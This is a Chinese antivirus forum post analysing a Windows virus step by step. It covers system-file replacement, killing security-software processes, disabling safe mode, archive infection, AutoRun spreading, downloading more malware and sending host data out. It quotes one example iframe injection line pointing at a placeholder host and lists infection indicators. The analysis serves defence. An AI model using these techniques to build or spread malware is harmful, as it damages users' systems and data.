pioneer
超级版主
积分 4563
发帖 4545
注册 2007-7-16
来自 BJ
|
#2
病毒分析:
1、病毒运行后,查找注册表键HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,查看netsvcs服务是否开启。
2、如果开启,尝试关闭此服务;如果此服务关闭,则查找查找%SystemRoot%\system32\qmgr.dll,调用sfc_os.#5函数去除系统文件保护,释放病毒文件%SystemRoot%\system32\qmgr.dll,替换系统文件完成自启动。
3、释放%Temp%\Loopt.bat批处理文件,删除病毒源文件。
4、在qmgr.dll中,比较自己是否在360tray.exe中,通过向设备"\\.\360SpShadow0"发送控制码,结束360tray.exe进程。
5、创建线程,循环遍历查找avp.exe、bdagent.exe、360tray.exe进程,如果找到则结束其进程。
6、修改注册表相关键值,禁用任务管理器和禁用显示隐藏文件;并通过删除注册表对应键值破坏安全模式
7、全盘查找后缀名为html、htm、asp、aspx、php、jsp格式的网页文件,如果找到,往目标文件中插入类似<iframe src=http://www.xx.cn/1.htm width=0 height=0></iframe>的恶意代码,并搜索后缀名为"gho、GHO、Gho"的文件,一旦找到,将其删除。使用户丢失系统备份数据。
8、病毒通过加载系统核心文件NTDLL.DLL,获得相关API函数虚拟地址,操作PhysicalMemory内核对象,并提升权限,从而实现对物理内存的直接读写操作。
9、全盘查找后缀名为rar、zip、tgz、tar的压缩包文件,一旦找到,利用%ProgramFiles%\WinRAR\Rar.exe程序将目标压缩包解压,将病毒程序"安装.bat"复制到解压出来的文件夹中,然后再压缩回去,完成将病毒添加到压缩包的功能
10.释放%Temp%\NtHid.sys驱动文件,创建名称为"NtHid"的服务,恢复SSDT,遍历查找并结束安全软件的进程,删除安全软件的相关文件,最后删除驱动文件 。
11、修改%SystemRoot%\System32\drivers\etc\hosts文件,屏蔽安全厂商网址和百度等网址。
12、开启网络,从指定地址下载大量病毒到本地运行,并统计被感染主机相关信息,将用户机器操作系统,MAC等信息发送到指定网址。
13、在每个盘符下生成文件AutoRun.inf,并创建目录 recycle.{645FF040-5081-101B-9F08-00AA002F954E},释放病毒文件recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe,并设置为隐藏,使用户每次双击磁盘和打开资源管理器时自动运行病毒。
病毒创建文件:
%SystemRoot%\system32\qmgr.dll
%Temp%\Loopt.bat
%Temp%\NtHid.sys
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe (X为被感染盘符)
病毒创建注册表:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\下建立大量安全软件的映像劫持
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ NtHid
病毒删除注册表:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
病毒删除文件:
%Temp%\NtHid.sys
病毒修改文件:
%SystemRoot%\System32\drivers\etc\hosts
[ Last edited by pioneer on 2010-5-6 at 17:46 ]
| |
※文章所有权归【pioneer】与【东方微点论坛】共同所有,转载请注明出处!※
|
 |
|
